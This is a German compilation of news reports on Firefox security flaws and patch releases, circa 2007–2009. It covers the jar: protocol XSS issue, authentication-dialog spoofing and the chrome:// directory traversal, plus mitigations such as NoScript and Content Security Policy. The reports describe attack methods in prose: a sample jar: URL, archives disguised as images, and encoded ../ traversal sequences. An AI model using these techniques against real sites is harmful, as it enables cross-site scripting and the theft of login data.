Dabei beschreibt http://www.foo.com/bar/baz.jar den Weg zum Archiv und !/COM/foo/Quux.class den Pfad zur Datei.
Da es sich bei dem Archiv nur um eine ZIP-Datei handelt und das Protokoll nicht nur auf Java-Dateien beschränkt ist, lassen sich auch andere Dateien auf diese Weise aufrufen:
jar:https://example.com/test.jar!/t.htm.
Dabei wird t.htm im Browser im Kontext von example.com dargestellt, was an sich nicht schlimm wäre, da das Dokument ja auch von dort stammt. Unglücklicherweise lassen sich damit aber etwa wie auf MySpace betriebene JavaScript-Filter austricksen, da diese nur die Inhalte der Seiten prüfen, nicht jedoch hochgeladene Dateien und Archive. Zudem funktioniert es ebenfalls, wenn man etwa test.zip in test.png umbenennt, um der Datei den Anschein eines Bildes zu geben. Der Trick funktioniert auch mit anderen Formaten, die im Wesentlichen nur ein komprimiertes Archiv darstellen, beispielsweise das Doc-Format unter OpenOffice.
Angreifer könnten mit einer präparierten URL etwa Eingaben auf anderen Seiten auslesen. Für einen erfolgreichen Angriff muss ein Phisher aber eine präparierte komprimierte Datei auf einem Server hinterlegen und sein Opfer dazu bringen, einen Link dorthin anzuklicken. Allerdings bleibt der mehr oder minder kryptische Link in der Adresszeile des Browser bei einem Angriff stehen.
Grundsätzlich hilft es, wie auch gegen die meisten anderen Cross-Site-Scripting-Angriffe, das Firefox-Modul NoScript eimzusetzen. Darüber hinaus empfiehlt das US-CERT Administratoren von Unternehmensnetzen, jar-URIs am Proxy oder der Firewall zu blockieren. Zudem können Betreiber von Webservern den Missbrauch ihrer Seiten verhindern, indem sie mit einem Reverse-Proxy URLs mit jar blockieren. Auch das Filtern der MIME-Typen, um die wirklich übertragenen Inhalte zu erkennen, soll helfen.
Siehe dazu auch:
* Web Mayhem: Firefox’s JAR: Protocol issues, Bericht von pdp
* Mozilla Firefox jar URI cross-site scripting vulnerability, Fehlerbericht des US-CERT
* jar: protocol is an XSS hazard due to ignoring mime type and being considered same-origin with hosting site, Bugzilla-Eintrag von Mozilla.org
Quelle und Links : http://www.heise.de/security/news/meldung/98721/Cross-Site-Scripting-Luecke-in-Firefox
-
Die kürzlich öffentlich bekannt gewordene Firefox-Schwachstelle in der Implementierung des jar-Protokolls weist offenbar noch mehr Potenzial für Missbrauch auf als vermutet. Die Lücke ermöglicht Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen. Bislang ging man davon aus, dass es dafür möglich sein muss, ZIP- und andere Archive mit präparierten Inhalten auf dem vom Opfer besuchten Webserver zu zu speichern.
Nach Angaben der Entwickler soll der Angriff aber auch mit Redirects funktionieren, sodass ein präpariertes Archiv auf einem beliebigen Server liegen darf. Um das Archiv aufzurufen, genügt es, einfach den Redirect im HTML-Code einzubetten oder eine Seite wie Google-Mail zu nutzen, die Redirects unterstützt. Ein Demonstrationsexploit der Firefox-Entwickler führt das Problem für Google-Mail-Konten vorf. Im Test der heise-Security-Redaktion las er die gespeicherten Kontakte aus. Die Entwickler planen, das Problem in Firefox 2.0.0.10 zu lösen, indem der Browser prüft, ob der MIME-Type des Archivs korrekt ist. Version 2.0.0.10 unterliegt derzeit noch diversen Tests.
Quelle : www.heise.de
-
Wie bereits vor einigen Tagen versprochen, haben die Mozilla-Entwickler ein neues Sicherheitsupdate für den Open-Source-Webbrowser Firefox vorgelegt. Die Version 2.0.0.10 schließt insgesamt drei Sicherheitslücken, die seit dem letzten Update bekannt wurden. Zu den Fehlern, die behoben wurden, gehört die Schwachstelle in der Implementierung des jar-Protokolls; dies ermöglichte Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen.
Die Bedeutung aller Sicherheitslücken (neben dem jar-Problem ein Bug, der Referer-Spoofing ermöglichte, und Fehler, die möglicherweise über Abstürze zu Code-Einschleusung genutzt werden konnten) schätzt die Mozilla-Foundation als "Hoch" ein. Anwender von Firefox sollten so schnell wie möglich auf die neue Version updaten. Firefox 2.0.0.10 steht für Windows, Mac OS X und Linux in diversen Landessprachen, darunter Deutsch, zum Download bereit. Nach und nach wird die neue Version auch allen Anwendern über die automatische Update-Funktion des Browsers angeboten.
Quelle : www.heise.de
-
Wenig Glück hat derzeit die Mozilla-Stiftung mit ihren neuen Firefox-Versionen. Die eben erst veröffentlichte Version 2.0.0.10, die drei Sicherheitslücken schließt, enthält einen neuen Fehler: Der Browser kann jetzt bestimmte Grafiken nicht mehr anzeigen.
Firefox 2.0.0.10 reagiert auf die JavaScript-Methode canvas.drawImage() mit der Ausnahme "NS_ERROR_NOT_AVAILABLE". Das Canvas-Objekt, ein seit Firefox 1.5 unterstützter Bestandteil von (X)HTML5, ermöglicht Vektorgrafiken per HTML und JavaScript; die jetzt fehlerhafte drawImage()-Methode zeichnet Pixelbilder in die Vektorgrafiken.
Schon die vorletzte Firefox-Version 2.0.0.8 hatte neben Sicherheits-Updates eine ganze Reihe von alten Fehler erneut in den Browser eingeschleust. Nach knapp zwei Wochen hatte Mozilla die Probleme beseitigt.
Quelle : www.heise.de
-
Dem in dieser Woche veröffentlichten Firefox 2.0.0.10 wird bereits in Kürze die Version 2.0.0.11 folgen. Diese Version ist notwendig geworden, nachdem sich in Firefox 2.0.0.10 ein schwerer Bug eingeschlichen hatte, der bisher in keiner Firefox-Version existierte.
Derzeit scheinen die Firefox-Entwickler etwas vom Pech verfolgt zu sein: Nachdem erst in dieser Woche Firefox 2.0.0.10 erschienen war, soll bereits in Kürze Firefox 2.0.0.11 folgen - seit Mitte Oktober die vierte neue Version des Browsers.
Was ist geschehen: Bereits kurz nach Veröffentlichung von Firefox 2.0.0.10 gingen Klagen darüber ein, dass eine bisher tadellos arbeitende Funktion bei der neuen Firefox-Version nicht mehr funktionierte. „canvas.drawImage“ verweigert in Firefox 2.0.0.10 seine Dienste. Der Fehler ist in diesem Bugzilla-Eintrag dokumentiert.
Diese Website belegt den Fehler. Eigentlich sollte auf dieser Seite oben rechts ein Bild dargestellt werden. Ruft man die Fehler-Konsole von Firefox auf (unter Extras), wird eine Fehlermeldung angezeigt. Weitere Seiten, die aufgrund des Fehlers nicht mehr funktionieren, werden im Bugzilla-Eintrag aufgelistet. Getroffen hat es auch Online-Shops, die die besagte Funktion für die Darstellung von Grafiken nutzen und seither nicht mehr von Firefox-Nutzern genutzt werden können, nach dem sich bei diesen automatisch die neue Version 2.0.0.10 installiert hat.
Der Bug in Firefox 2.0.0.10 ist bereits behoben worden. Derzeit befinden sich Vorabfassungen von Firefox 2.0.0.11 im Test-Stadium. Die Release-Candidates von Firefox 2.0.0.11 in diversen Sprachen und für Windows, Linux und MacOS X sind in diesem FTP-Verzeichnis bei Mozilla abgelegt.
Die finale Version von 2.0.0.11 könnte noch im November erscheinen. Gemunkelt wird, dass es bereits am Freitag, den 30. November, so weit sein könnte.
Quelle : www.pcwelt.de
-
Die angekündigte Firefox-Version 2.0.0.11 ist jetzt verfügbar, auf Deutsch und auch bereits als Update, manuell wie automatisch.
-
Manchmal ist es ein Kreuz mit der Software-Entwicklung und der Kontrolle der Änderungen in einzelnen Versionen, mögen sich die Programmierer des Open-Source-Webbrowsers Firefox gedacht haben: Da korrigiert man einige Sicherheitslecks und führt mit der dafür freigegebenen neuen Version seiner Software einen alten Fehler wieder ein – und muss daher schnell eine weitere Version nachlegen.
So erneut geschehen mit Firefox 2.0.0.10: Neben drei geschlossenen Sicherheitslücken tauchte ein früher bereits behobener Fehler in der JavaScript-Methode canvas.drawImage() wieder auf. Firefox 2.0.0.10 reagiert auf die JavaScript-Methode canvas.drawImage() mit der Ausnahme "NS_ERROR_NOT_AVAILABLE". Das Canvas-Objekt, ein seit Firefox 1.5 unterstützter Bestandteil von (X)HTML5, ermöglicht Vektorgrafiken per HTML und JavaScript; die fehlerhafte drawImage()-Methode zeichnet Pixelbilder in die Vektorgrafiken.
Die Entwickler der Mozilla-Foundation haben daher eine weitere Bugfix-Version nachgeschoben: Firefox 2.0.0.11 korrigiert den Fehler. Die neue Version, deren Release Notes recht knapp ausgefallen sind, steht zum Download in diversen Landessprachen, darunter Deutsch, für Windows, Mac OS X und Linux zur Verfügung. Außerdem wird sie innerhalb von 48 Stunden nach und nach an alle Nutzer des Browsers verteilt, die die automatische Update-Funktion aktiviert haben.
Parallel wurde die Version 1.1.7 der auf Mozilla-Code und der ehemaligen Mozilla-Suite basierenden Websuite Seamonkey veröffentlicht. Sie schließt die gleichen Sicherheitslecks wie Firefox 2.0.0.10 sowie einige Bugfixes – da die Version aber noch Korrektur des Fehlers in canvas.drawImage() im Firefox-Code fertig wurde, soll dieser Bug in der neuen Seamonkey-Version gar nicht erst wieder auftauchen.
Quelle : www.heise.de
-
Firefox weist nach Angaben des israelischen Sicherheitsspezialisten Aviv Raff eine Schwachstelle bei der Darstellung von Authentifizierungs-Dialogen auf, die es beispielsweise Phishern erleichtern soll, Anwendern Anmeldedaten von Webseiten abzuluchsen. Die Basic Authentication dient zur Zugriffsbeschränkung auf Webseiten und erfordert die Eingabe des Usernamens und eines Passwortes. In der dazu passenden Dialogbox ist neben dem Namen der anfordernden Instanz, dem so genannten Realm, auch angegeben, von welchem Webserver die Authentifizierungsaufforderung kam. Allerdings schlampt Firefox offenbar bei der Auswertung und Anzeige des Realms. Mit Single Quotes und Spaces lässt sich laut Raff ein Dialog darstellen, der dem Anwender vorgaukelt, von einer ihm vertrauten Seite zu stammen, obwohl er von einer Phishing-Seite stammt.
Raff hat auf seiner Webseite eine Videodatei (WMV-Datei) hinterlegt, die das Problem demonstriert. Für einen erfolgreichen Angriff muss ein Opfer aber einem präparierten Link auf einer bösartigen Webseite folgen. Allerdings ist nicht so ohne Weiteres ersichtlich, dass man gerade angegriffen wird – man stelle sich vor, eine scheinbar harmlose Seite von MySpace verlinkt auf die Buchwunschliste von Amazon und gaukelt anschließend dort einen Login vor. Bei der veränderten Art des Logins sollen dem Opfer aber immerhin Zweifel kommen, dass es noch mit rechten Dingen zugeht.
Betroffen sind laut Bericht Mozilla Firefox 2.0.0.11 und wahrscheinlich vorherige Versionen, möglicherweise auch anderen Produkte der Mozilla Foundation. Ein Update gibt es noch nicht. Raff empfiehlt bis dahin, kein Anmeldedaten in den genannten Dialogen einzugeben. Zuletzt hatte er auf ein Sicherheitsproblem in der Toolbar von Google aufmerksam gemacht.
Siehe dazu auch:
* Yet another Dialog Spoofing - Firefox Basic Authentication, Fehlerbericht von Aviv Raff
Quelle und Links : http://www.heise.de/security/news/meldung/101233/Spoofing-Schwachstelle-im-Webbrowser-Firefox
-
Aufgrund einer sogenannten Directory-Traversal-Schwachstelle in Firefox können manipulierte Webseiten möglicherweise vertrauliche Informationen auf dem Rechner auslesen. Die Mozilla-Entwickler untersuchen das Sicherheitsleck zurzeit.
In dem Blog hiredhacker.com ist eine Demonstration der Schwachstelle aufgetaucht. Sie soll vorführen, wie eine Webseite auf die gespeicherten Einstellungen des Mailprogramms Thunderbird zugreifen kann. Dazu muss in Firefox jedoch eine Erweiterung installiert sein, die nicht als .jar-Archiv verpackt ist. Den Mozilla-Entwicklern zufolge liegen Browser-Erweiterungen allerdings häufiger in so einer Form vor. Eine Webseite kann beispielsweise mit den Befehlen zum Einbinden von Bildern, Skripten oder Stylesheets dann auf chrome://-URLs zugreifen. In diesen URLs wandelt Firefox kodierte Zeichen wie %2e%2e%2f nicht in ../ um und filtert sie auch nicht aus, sodass darüber beliebige Dateien ausgelesen werden können.
Angreifer können so jedoch auch überprüfen, ob bestimmte Programme und Erweiterungen installiert sind. Damit können Schädlingsbastler, die Anwendern mit präparierten Webseiten Schadcode unterjubeln wollen, möglicherweise mit einer solchen Webseite noch mehr Schwachstellen auf einem Rechner finden und missbrauchen.
Als Beispiele für Erweiterungen, die das Ausnutzen der Schwachstelle ermöglichen, nennen die Mozilla-Entwickler Download Statusbar und Greasemonkey. Der Entwickler von Download Statusbar hat inwischen ein aktualisiertes Paket bereitgestellt, das als .jar verpackt ist. Nutzer des Add-ons sollten die installierte Version rasch aktualisieren.
Den Fehler haben die Mozilla-Entwickler ursprünglich als niedriges Risiko eingestuft. Dem Eintrag im Fehlerverfolgungssystem Bugzilla zufolge soll der Fehler in der Render-Engine Version 1.8.1.12 beseitigt werden; Firefox 2.0.11 nutzt Version 1.8.1.11. Wann die fehlerbereinigte Version erscheinen soll, ist bislang jedoch noch unklar.
Siehe dazu auch:
* chrome protocol directory traversal, Eintrag im Mozilla-Sicherheits-Blog
* chrome directory traversal (local disk access via "flat" addons), Eintrag im Mozilla-Bugtracker
* Firefox chrome: URL Handling Directory Traversal., Eintrag im Blog hiredhacker
Quelle : http://www.heise.de/security/news/meldung/102271/Firefox-gibt-Informationen-preis--
-
Mit Hilfe unkonventionell gepackter Firefox-Erweiterungen kann eine Sicherheitslücke im chrome-Protokoll des Mozilla-Browsers ausgenutzt werden, um Benutzerdaten auszulesen.
Auf einer Hacker-Website ist ein Demo-Exploit veröffentlicht worden, der die Ausnutzung einer bis dahin noch nicht bekannten Schwachstelle in Firefox aufzeigt. Er demonstriert den Zugriff auf Einstellungen des Mail-Programms Thunderbird. Voraussetzung ist, dass eine Firefox-Erweiterung installiert ist, die nicht wie üblich als JAR-Archiv verpackt ist. Mit einer speziell präparierten Web-Seite könnten Angreifer Scripte einsetzen, die auf chrome://-URLs zugreifen und Daten auslesen, die an sich nicht zugänglich sein sollten.
Wie die Mozilla-Sicherheitschefin Window Snyder inzwischen bestätigt hat, filtert Firefox Verzeichnisangaben wie "../" (Wechsel in eine höhere Ebene) unter Umständen nicht aus. Script-Code in einer präparierten Web-Seite kann so Bilder, weitere Scripte oder Stylesheets von bekannten Speicherorten auf der lokalen Festplatte laden.
Mit Hilfe eines solchen Angriffs könnten Daten ausspioniert werden, die sich für weitere Angriffe ausnutzen lassen, etwa für Phishing. So können Angreifer auch Informationen über weitere installierte Erweiterungen erhalten. Erweiterungen wie "Download Statusbar" und "Greasemonkey" sind Beispiele für Add-ons, die nicht als JAR-Archiv verpackt sind und daher diese Tür für Angriffe öffnen können. Diese beiden sind inzwischen in einer neuen Fassung erhältlich, die in einem JAR-Archiv steckt und daher nicht mehr ausgenutzt werden kann.
Die Mozilla-Entwickler arbeiten in der Zwischenzeit an einer Lösung, die im nächsten Update für Firefox enthalten sein wird. In der Zwischenzeit können sich Firefox-Nutzer mit der Erweiterung "Noscript" schützen, die auch Zugriffe auf das chrome-Protokoll blockiert.
Quelle : www.pcwelt.de
-
Das Risiko einer kürzlich bekannt gewordenen Sicherheitslücke in Firefox, die das Ausspähen von Daten auf dem Rechner ermöglicht, schätzen die Mozilla-Entwickler inzwischen als hoch ein. Durch Browser-Add-ons, die nicht als .jar-Archiv verpackt sind, sondern als sogenanntes "Flat Package" vorliegen, können Angreifer mit manipulierten chrome://-Verknüpfungen in bestimmten HTML-Tags in Webseiten die Lücke ausnutzen.
Im Sicherheitsblog der Mozilla-Foundation hat die Sicherheitschefin Window Snyder ein Status-Update eingestellt. Darin verlinkt sie eine ausführliche, aber nicht vollständige Liste von Add-ons, die nicht als .jar-Paket installiert werden und daher die Sicherheitslücke aufreißen. Die Entwickler der Add-ons bittet Snyder zudem, die Add-ons in ein .jar-Archiv zu verpacken und die Aktualisierung zu veröffentlichen.
Gerry Eisenhaur hat den Blog-Eintrag auf hiredhacker.com zwischenzeitlich aktualisiert, in dem er die Lücke bekannt gemacht hat, um eine weitere Demonstration der Lücke zu ergänzen, die den Inhalt der sessionstore.js-Datei ausliest. Sie soll dadurch Informationen der aktuellen Browsersitzung wie Cookies oder geöffnete Tabulatoren anzeigen. Eisenhaur weist in dem Blog-Eintrag auch darauf hin, dass die populäre Browser-Erweiterung NoScript vor Angriffen auf diese Lücke schützt.
Die Mozilla-Entwickler haben den Fehler in den Entwicklungszweigen bereits behoben und testen den Code in den Nightly Builds des Release-Candidate von Firefox 2.0.0.12. Medienberichten zufolge soll der Browser am 5. Februar in der finalen Version freigegeben werden.
Quelle : www.heise.de
-
Die Mozilla-Foundation hat mit dem Update des Firefox-Browser auf Version 2.0.0.12 zahlreiche Sicherheitslücken beseitigt. Zwar gibt es nur elf Fehlerberichte, darin sind aber teilweise jeweils mehrere Fehler zusammengefasst. Mindestens drei davon stufen die Entwickler als kritisch ein. Dazu gehört ein Fehler, mit dem eine manipulierte Webseite über designMode-Frames die Browser-Historie auslesen kann. Zusätzlich lässt sich der Browser dadurch auch zum Absturz bringen. Nach Meinung der Entwickler ließe sich der Fehler eventuell auch zum Einschleusen von Code ausnutzen.
Der Fehlerbericht 2008-03 erwähnt gleich mehrere kritische Fehler, mit denen es möglich sein soll, JavaScript mit Chrome-Privilegien, also den höchsten Rechten, in Firefox auszuführen. Zudem weist der Bericht auf eine Schwachstelle in der Funktion XMLDocument.load hin, über die sich JavaScript in einen anderen Frame injizieren lässt. Laut Advisory 2008-01 gab es zudem mehrere Fehler in der Browser-Engine, die zum Absturz führten. Bei einigen dieser Fehler vermuten die Entwickler, dass ein Angreifer sie mit einem gewissem Aufwand ausnutzen könne, um einen PC mit Schadcode zu infizieren.
Auch der Mail-Client Thunderbird ist für dieses Problem anfällig, allerdings treten die Fehler wohl nur in Zusammenhang mit JavaScript auf – und das ist in Thunderbird standardmäßig deaktiviert. Der Fehler soll zwar in Version 2.0.0.12 des Mail-Clients behoben sein, bislang steht aber immer noch Version 2.0.0.9 auf den offiziellen Seiten zum Download.
Auch die kürzlich bekannt gewordene Directory-Traversal-Lücke wurde geschlossen. Durch Browser-Add-ons, die nicht als .jar-Archiv verpackt sind, sondern als so genanntes "Flat Package" vorliegen, können Angreifer mit manipulierten chrome://-Verknüpfungen in bestimmten HTML-Tags in Webseiten die Lücke ausnutzen. Die restlichen Fehler sind weniger kritisch bis unkritisch.
Auch die Web-Suite Seamonkey ist in der aktualisierten Fassung 1.1.8 erschienen. Anwender von Firefox, Thunderbird und Seamonkey können zur Aktualisierung die integrierte Update-Funktion benutzen. Anwender der meisten Linux-Distributionen müssen auf die neuen Paketen warten, da die Update-Funktion in den Anwendungen selbst deaktiviert ist.
Siehe dazu auch:
* Known Vulnerabilities in Mozilla Products, Fehlerbericht der Mozilla-Foundation
Quelle : http://www.heise.de/newsticker/meldung/103173
-
Die Firefox-Entwickler haben Version 3.0.5 vorgelegt, in der acht Sicherheitslücken beseitigt sind. Drei davon haben die Entwickler als kritisch eingestuft, wovon zwei das Aushebeln der Same-Origin-Policy und damit das Ausführen von JavaScript im Kontext anderer Seiten ermöglichen. Die dritte kritische Lücke ist auf mehrere Fehler in der Browser-Engine zurückzuführen, die in der Regel zum Absturz des Browsers führen. Allerdings gibt es Hinweise darauf, dass sich darüber auch Code einschleusen und ausführen lässt. Die Entwickler gehen in solchen Fällen in der Regel auf Nummer sicher und stufen daher auch solche potenziellen Lücken als kritisch ein.
Eine vierte Lücke wird als weniger kritisch angesehen, sie ermöglicht aber immerhin JavaScripten auf einer bösartigen Seite den Cross-Domain-Zugriff auf Daten nach einem Redirect auf eine andere Seite. Die restlichen Probleme in Firefox sind eher unkritisch.
In Version Firefox 2.0.0.19 des Firefox sind die gleichen Lücken wie in 3.0.5 beseitigt. Zusätzlich wurde aber noch eine Cross-Site-Scripting-Lücke im Feed Preview aus der Welt geschaffen. Für die Version 2.x ist dies das letzte Update. Die Reihe wird ab nun nicht mehr weitergepflegt, Sicherheits-Updates gibt es keine mehr. Darüberhinaus wurde für die Version 2.x der Pishing-Schutz wie angekündigt deaktiviert. Anwender erhalten nun beim Aufruf von betrügerischer Seiten keine Warnungen mehr. Die Mozilla Foundation empfiehlt Anwendern, auf die Firefox-Version 3.0 umzusteigen.
Zudem ist SeaMonkey in Version 1.1.14 erschienen, in dem ebenfalls mehrere Lücken geschlossen sind. Vom einigen der nun beseitigten Probleme ist auch der Mailclient Thunderbird betroffen. Üblicherweise erscheint ein Update aber erst einige Tage nach Veröffentlichung der Browser. Ohnehin ist derzeit nicht ganz klar, wie es mit Sicherheits-Updates für Thunderbird 2 weitergeht, der auf der Gecko-Engine 1.8 beruht, die mit Einstellung des Supports für Firefox 2.x nun aber nicht mehr gepflegt werden soll. Der Nachfolger Thunderbird 3 dürfte indes noch einige Monate auf sich warten lassen.
Unterdessen führt Firefox nach Angaben des Herstellers Bit9, einem Spezialisten für Application Whitelisting und Application Control, die Liste der am meisten verwundbaren Anwendungen (PDF-Datei) unter Windows an. Dicht darauf folgen Adobe Reader, Adobe Flash, VMware, Java und QuickTime. Auf die Liste gelangten jedoch nur solche Anwendungen, die sich nicht durch Softwareverteilungs- und Update-Tools wie Microsoft SMS und WSUS aktualisieren lassen.
Siehe dazu auch:
* Mozilla amputiert Phishing-Schutz in Firefox 2, Bericht auf heise Security
* Firefox 2: Das Ende naht, Bericht auf heise Security
Quelle : http://www.heise.de/newsticker/Webbrowser-Firefox-3-0-5-schliesst-mehrere-Sicherheitsluecken--/meldung/120565
-
Eigentlich sollte die gestern veröffentlichte Version 2.0.19 die letzte für Firefox 2 sein. Doch laut Firefox-Chef Mike Beltzner fehlt ausgerechnet wegen eines Schreibfehlers zumindest in der Windows-Version ein Patch. Welche der acht Sicherheitslücken das betrifft, führt Beltzer nicht weiter aus. Er schreibt jedoch, dass der Fehler im Packetierungs- und Signierungs-Prozess aufgetreten sei. Das erklärt, weshalb nur die Windows-Version betroffen sein soll und die anderen nicht.
Anzeige
Jetzt will das Mozilla-Team zumindest für Windows baldmöglichst eine allerletzte Version 2.0.20 nachlegen, die den Patch enthält. Mozilla empfiehlt jedoch nach wie vor allen Anwendern, gleich auf Firefox 3 umzusteigen, insbesondere auch, weil Firefox 2.0.19 keinen Phishing-Schutz mehr enthält.
Quelle : www.heise.de
-
Danke Sil, hat sich bei mir gestern vollautomatisch installiert! Aber, dass der Fuchs die Hitliste der verwundbarsten Anwendungen anführt, läßt nachdenklich werden (da war ich wohl zu naiv!) ???
-
Die Entwickler haben sich beeilt und einen Patch für Firefox 2 nachgereicht, der zumindest der Windows-Version des vorgestern erschienenen Version 2.0.19 des freien Browsers fehlte. Mit Firefox 2.0.20 schickt Mozilla den Zweier-Zweig des Browsers offiziell in den Ruhestand und legt Nutzern ein Upgrade auf Firefox 3.0 ans Herz.
Firefox 2.0.0.20 steht auf den Mozilla-Seiten zum Download bereit, lässt sich jedoch auch mit der im Browser eingebauten Update-Funktion aktualisieren.
Quelle : www.heise.de
-
Aktuelle Version beseitigt Sicherheitslücken
Mit Thunderbird 2.0.0.19 werden mehrere Sicherheitslücken in dem E-Mail-Client beseitigt. Damit zieht der E-Mail-Client mit dem Browser Firefox gleich, für den das Sicherheitsupdate bereits seit zwei Wochen verfügbar ist.
Die Sicherheitslecks in Thunderbird weisen im Unterschied zu den gleichen Sicherheitslücken in Firefox eine geringere Gefährdungsstufe auf. Denn standardmäßig sind in Thunderbird als Vorsichtsmaßnahme alle JavaScript-Funktionen deaktiviert und die Mehrzahl der beseitigten Sicherheitslöcher lässt sich nur über JavaScript ausnutzen.
Falls JavaScript in Thunderbird aktiviert ist, können gleich eine Reihe von Sicherheitslücken dazu missbraucht werden, schadhaften Programmcode auszuführen. Ein Opfer muss lediglich dazu gebracht werden, eine entsprechend manipulierte HTML-E-Mail mit dem E-Mail-Client zu öffnen. Zwei andere Sicherheitslecks in Thunderbird lassen sich nicht direkt für schädliche Aktionen missbrauchen und weisen damit ein noch geringeres Risiko auf.
Thunderbird 2.0.0.19 steht ab sofort für Windows, Linux und MacOS X unter anderem in deutscher Sprache als Download bereit.
http://www.mozilla.com/en-US/thunderbird/all.html
Quelle : www.golem.de
-
Neue Version schließt sechs Sicherheitslücken
Mozilla hat den Browser Firefox in der Version 3.0.6 veröffentlicht. Die neue Version korrigiert einige allgemeine Programmfehler und schließt Sicherheitslücken. Eine dieser Sicherheitslecks stufen die Entwickler als kritisch ein.
Korrekturen für sechs Sicherheitsprobleme enthält die neue Firefox-Version 3.0.6. Eines der Probleme stuften die Entwickler als kritisch ein, es betrifft die Browser-Engine. Durch Javascript soll es Angreifern möglich sein, den Browser zum Absturz zu bringen oder beliebigen Code auszuführen. Thunderbird und SeaMonkey enthalten den Fehler ebenfalls.
Weiterhin soll Firefox 3.0.6 für mehr Stabilität sorgen. Skriptgesteuerte Befehle, wie sie einige Erweiterungen verwenden, arbeiten jetzt besser mit Plug-ins zusammen und aus den Absturzmeldungen wurde die Benutzerkennung entfernt. Außerdem behebt die neue Version einen Fehler, der zu Problemen mit mit der Aktualisierung verschiedener Bildschirmbereiche führte, wenn der Browser längere Zeit geöffnet war.
Firefox 3.0.6 steht ab sofort zum Download für Windows, Mac und Linux bereit. Die Entwickler empfehlen, die neue Version zu installieren. Sie soll auch über die Auto-Update-Funktion des Browsers angeboten werden.
Quelle : www.golem.de
-
Thunderbird und SeaMonkey sind ebenfalls betroffen
Die Version 3.0.7 von Firefox beseitigt mehrere Sicherheitslücken, wovon die Mehrzahl zur Ausführung beliebigen Programmcodes missbraucht werden kann. Neue Funktionen bringt das Update ansonsten nicht, es korrigiert aber einige Programmfehler.
Die als gefährlich eingestuften Sicherheitslücken befinden sich in den JavaScript-Funktionen von Firefox, bei der Verarbeitung von XUL-DOM-Elementen sowie bei der PNG-Darstellung. In allen Fällen braucht ein Angreifer sein Opfer nur dazu zu verleiten, eine entsprechend präparierte Webseite zu öffnen, um das Sicherheitsloch auszunutzen und Schadcode auszuführen.
Ein weiterer Fehler bei der XML-Datenverarbeitung erlaubt das Ausspähen von Daten und wird als weniger gefährlich klassifiziert. Zudem kommt es bei der URL-Verarbeitung zu einem Fehler, so dass Spoofing-Angriffe möglich sind. Beide Sicherheitslücken beseitigt das Firefox-Update auf die Version 3.0.7.
Darüber hinaus korrigiert die aktuelle Firefox-Version einige kleinere Programmfehler. Unter anderem soll es nicht mehr passieren, dass alle Einträge im Dateimenü inaktiv sind, nachdem der Nutzer den Druckbefehl des Browsers genutzt hat. In einigen Fällen vergaß Firefox gespeicherte Cookie-Daten nach einigen Tagen. Auch dieser Fehler soll nicht mehr vorkommen.
Firefox 3.0.7 steht ab sofort als Download unter anderem in deutscher Sprache für Windows, Linux und MacOS bereit. Alternativ steht die aktuelle Version bereits über die Updatefunktion der Software zur Verfügung.
Die mit Firefox 3.0.7 geschlossenen Sicherheitslücken finden sich auch in Thunderbird 2.x sowie SeaMonkey 1.1.x. Bislang stehen von diesen Applikationen aber keine aktualisierten Programmversionen zur Verfügung.
Quelle : www.golem.de
-
Die Mozilla-Foundation will kommende Woche die Firefox-Version 3.0.8 veröffentlichen, um eine kritische Lücke in ihrem Browser zu schließen. Bekannt geworden war die Lücke durch die Veröffentlichung eines Proof-of-Concept-Exploits am gestrigen Mittwoch durch den Sicherheitsspezialisten Guio Landi. Ursache des Problems ist ein Fehler bei der Verarbeitung fehlerhafter XML- beziehungsweise XSL-Dateien, die zu einem Speicherfehler führen.
Der Demo-Code von Landi verursachte zwar bei einem kurzen Test der heise-Security-Redaktion nur den Absturz des Browsers, offenbar lässt er sich aber in der nicht entschärften Version zum Einschleusen und Ausführen von Code ausnutzen. Dazu muss man aber nach Angaben des Autors Heap Spraying einsetzen, weshalb vermutlich das Deaktivieren von JavaScript kurzfristig Schutz vor echten Exploits bieten könnte.
Betroffen sind die Versionen 3.0 bis 3.0.7 auf allen Betriebssystemen. Die Firefox-Entwickler haben zwar bereits einen Patch entwickelt, der muss aber noch getestet werden. Der Fehler ist nach Meinung des Entwicklers Blake Kaplan eigentlich ziemlich offensichtlich – wenn man denn einmal richtig hingeschaut hat. Version 3.0.8 ist in den Release-Ankündigungen als "high-priority firedrill security update" vermerkt.
Quelle : http://www.heise.de/newsticker/Exploit-fuer-ungepatchte-Luecke-in-Firefox--/meldung/135284
-
Mozilla beseitigt Lücke von Pwn2Own-Gewinner Nils
Mozilla schließt zwei kritische Sicherheitslücken im Browser Firefox. Mindestens eine davon kann von Angreifern genutzt werden, um fremden Code auszuführen.
Über ein beliebiges XUL-Element lässt sich in Firefox 3 fremder Code ausführen und so die Kontrolle über den Browser und das System übernehmen (MFSA 2009-13). Entdeckt hat das Problem ein Sicherheitsforscher namens Nils, der damit den Wettbewerb Pwn2Own auf der Konferenz CanSecWest gewann.
Der zweite Fehler tritt bei der XSL-Transformation auf. Guido Landi fand heraus, dass ein XSL-Stylesheet Firefox zum Absturz bringen kann. Das könnten Angreifen womöglich nutzen, um eigenen Code auf fremden Systemen auszuführen (MFSA 2009-12).
Firefox 3.0.8 beseitigt diese beiden Sicherheitslücken und steht unter mozilla.com zum Download und über die interne Updatefunktion bereit.
Quelle : www.golem.de
-
Die Mozilla Foundation hat in ihrem Security Blog ein neues Sicherheitskonzept vorgestellt, dass Abhilfe gegen die mittlerweile epidemische Ausmaße erreichenden Cross-Site-Scripting-Attacken (XSS) respektive Schwachstellen bringen soll: Content Security Policy (CSP). Damit sollen Web-Administratoren dem Browser durch Senden eines speziellen Headers mitteilen können, welche Domains er als Quelle vertrauenswürdigen Codes akzeptieren soll. Herkömmliche XSS-Attacken machen sich unter anderem Lücken in Webanwendungen zunutze, um JavaScript im Kontext vertrauter Domains im Browser auszuführen.
Bei CSP soll der Browser nur Skripte ausführen, die aus Domains stammen, die in einer Whitelist zusammengefasst sind – alles andere wird geblockt. So kann der Administrator etwa einen eigenständigen Skript-Server spezifizieren, von dem der Browser Skripte nachlädt und ausführt. Angreifer sollen so keine Skripte mehr in HTML-Dokumente einschleusen können.
